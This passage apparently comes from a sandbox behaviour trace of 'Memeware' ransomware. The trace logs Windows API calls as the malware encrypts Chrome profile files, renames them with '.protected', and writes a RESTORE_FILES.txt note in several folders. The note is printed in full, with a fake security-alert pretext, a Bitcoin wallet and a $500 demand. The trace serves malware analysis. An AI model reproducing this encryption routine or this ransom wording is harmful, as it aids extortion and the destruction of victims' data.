payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.182] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: 
lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0084.183] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.183] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0084.183] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.183] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0084.183] CloseHandle (hObject=0x158) returned 1 [0084.184] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0084.184] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0084.184] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension 
Settings\\RESTORE_FILES.txt") returned 122 [0084.184] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.184] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.184] WriteFile (in: 
hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0084.185] lstrlenA (lpString="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") returned 684 [0084.185] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0084.185] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.185] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0084.185] CloseHandle (hObject=0x154) returned 1 [0084.186] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.186] lstrcmpiW (lpString1="Local Storage", lpString2="Windows") returned -1 [0084.186] lstrcmpiW (lpString1="Local Storage", lpString2="Program Files") returned -1 [0084.186] lstrcmpiW (lpString1="Local Storage", lpString2="Program Files (x86)") returned -1 [0084.186] lstrcmpiW (lpString1="Local Storage", lpString2="$Recycle.bin") returned 1 [0084.186] lstrcmpiW (lpString1="Local Storage", lpString2="System Volume Information") returned -1 [0084.186] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage") returned 93 [0084.186] lstrcmpW (lpString1="Local Storage", lpString2=".") returned 1 [0084.186] lstrcmpW (lpString1="Local Storage", lpString2="..") returned 1 
[0084.186] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\*") returned 95 [0084.186] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0084.199] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.199] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.199] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.199] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.199] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.199] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\.") returned 95 [0084.199] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.199] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.199] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.199] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.199] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.199] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.199] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.199] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\..") returned 96 [0084.199] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.199] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.199] FindNextFileW (in: 
hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.199] lstrcmpiW (lpString1="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage", lpString2="Windows") returned -1 [0084.199] lstrcmpiW (lpString1="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage", lpString2="Program Files") returned -1 [0084.199] lstrcmpiW (lpString1="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage", lpString2="Program Files (x86)") returned -1 [0084.199] lstrcmpiW (lpString1="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage", lpString2="$Recycle.bin") returned 1 [0084.199] lstrcmpiW (lpString1="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage", lpString2="System Volume Information") returned -1 [0084.199] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage") returned 158 [0084.199] StrStrIW (lpFirst="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage", lpSrch=".protected") returned 0x0 [0084.199] lstrcmpW (lpString1="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage", lpString2="RESTORE_FILES.txt") returned -1 [0084.199] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0084.199] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0084.199] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local 
storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.200] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage") returned 158 [0084.200] StrStrW (lpFirst="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage", lpSrch=".txt") returned 0x0 [0084.200] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage") returned 158 [0084.200] StrStrW (lpFirst="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage", lpSrch=".rar") returned 0x0 [0084.200] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage") returned 158 [0084.200] StrStrW (lpFirst="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage", lpSrch=".zip") returned 0x0 [0084.200] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0084.205] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.205] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0084.205] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.206] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0084.206] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0084.206] CloseHandle (hObject=0x158) returned 1 [0084.206] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage.protected") returned 168 [0084.206] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage.protected")) returned 1 [0084.207] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.207] lstrcmpiW (lpString1="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal", lpString2="Windows") returned -1 [0084.207] lstrcmpiW 
(lpString1="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal", lpString2="Program Files") returned -1 [0084.207] lstrcmpiW (lpString1="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal", lpString2="Program Files (x86)") returned -1 [0084.207] lstrcmpiW (lpString1="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal", lpString2="$Recycle.bin") returned 1 [0084.207] lstrcmpiW (lpString1="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal", lpString2="System Volume Information") returned -1 [0084.207] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal") returned 166 [0084.207] StrStrIW (lpFirst="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal", lpSrch=".protected") returned 0x0 [0084.207] lstrcmpW (lpString1="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal", lpString2="RESTORE_FILES.txt") returned -1 [0084.207] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0084.207] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0084.207] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.208] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal") returned 166 [0084.208] StrStrW (lpFirst="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal", lpSrch=".txt") returned 0x0 [0084.208] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal") returned 166 [0084.208] StrStrW (lpFirst="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal", lpSrch=".rar") returned 0x0 [0084.208] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal") returned 166 [0084.208] StrStrW (lpFirst="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal", lpSrch=".zip") returned 0x0 [0084.208] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x0, lpOverlapped=0x0) returned 1 [0084.208] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.208] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x0, lpOverlapped=0x0) returned 1 [0084.208] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.208] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, 
lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0084.209] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0084.209] CloseHandle (hObject=0x158) returned 1 [0084.209] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal.protected") returned 176 [0084.209] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal.protected")) returned 1 [0084.210] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0084.210] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0084.210] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\RESTORE_FILES.txt") returned 111 
[0084.210] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.210] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.211] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, 
lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0084.211] lstrlenA (lpString="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") returned 684 [0084.211] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0084.211] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.211] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0084.212] CloseHandle (hObject=0x154) returned 1 [0084.212] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.212] lstrcmpiW (lpString1="Login Data", lpString2="Windows") returned -1 [0084.212] lstrcmpiW (lpString1="Login Data", lpString2="Program Files") returned -1 [0084.212] lstrcmpiW (lpString1="Login Data", lpString2="Program Files (x86)") returned -1 [0084.212] lstrcmpiW (lpString1="Login Data", lpString2="$Recycle.bin") returned 1 [0084.212] lstrcmpiW (lpString1="Login Data", lpString2="System Volume Information") returned -1 [0084.212] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data") returned 90 [0084.212] StrStrIW (lpFirst="Login Data", lpSrch=".protected") returned 0x0 [0084.212] lstrcmpW (lpString1="Login Data", lpString2="RESTORE_FILES.txt") returned -1 [0084.212] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, 
pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.212] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.212] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\login data"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.213] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data") returned 90 [0084.213] StrStrW (lpFirst="Login Data", lpSrch=".txt") returned 0x0 [0084.213] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data") returned 90 [0084.213] StrStrW (lpFirst="Login Data", lpSrch=".rar") returned 0x0 [0084.213] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data") returned 90 [0084.213] StrStrW (lpFirst="Login Data", lpSrch=".zip") returned 0x0 [0084.213] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, 